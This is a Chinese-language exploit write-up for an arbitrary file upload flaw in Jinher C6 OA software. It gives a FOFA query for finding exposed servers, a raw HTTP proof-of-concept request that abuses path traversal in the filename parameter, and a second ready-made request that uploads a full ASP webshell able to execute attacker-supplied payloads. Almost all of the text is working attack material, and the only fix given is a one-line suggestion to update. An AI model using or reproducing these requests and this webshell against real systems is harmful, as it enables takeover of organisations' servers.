产品简介

金和网络是专业信息化服务商，为城市监管部门提供了互联网+监管解决方案，为企事业单位提供组织协同OA系统升开发平台，电子政务一体化平台智慧电商平合等服务

漏洞概述

金和-c6 uploadfileeditorsave 任意文件上传，攻击者可通过此漏洞获取服务器权限

指纹识别

fofa:

app="金和网络-金和OA"

漏洞利用

poc:

POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 191
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg"
Content-Type: image/png

<% response.write(111*111)
%>

------9fh1lo9qobtszaiahg6v--

验证url

http://your_ip/C6/filename参数中的文件名

上传webshell

POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\b.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 1282
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="b.jpg"
Content-Type: image/png

<%
Set AWf2I = Server.CreateObject("Scripting.Dictionary")

Function BPMMI0(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set C2xl = CreateObject("ADODB.Stream")
    C2xl.CharSet = "iso-8859-1"
    C2xl.Type = 2
    C2xl.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            C2xl.WriteText chrw(ascb(midb(content,i,1)))
        Next
    end if
    C2xl.Position = 0
    if isBin then
        C2xl.Type = 1
        BPMMI0=C2xl.Read()
    else
        BPMMI0=C2xl.ReadText()
    end if

End Function
    content = request.BinaryRead(request.TotalBytes)
    if len(request.Cookies.Item("hhh"))>0  then
        if  IsEmpty(Session("payload")) then
            content=BPMMI0(content,false)
            Session("payload")=content
            response.End
        else
            AWf2I.Add "payload",Session("payload")
            Execute(AWf2I("payload"))
            result=run(content)
            if not IsEmpty(result) then
                response.BinaryWrite result
            end if
        end if
    end if
%>


------9fh1lo9qobtszaiahg6v--

测试连接

修复建议

联系软件厂商更新至最新安全版本

【千山以外有千山，这就是江山；六宫粉黛独见你，这就是美人。】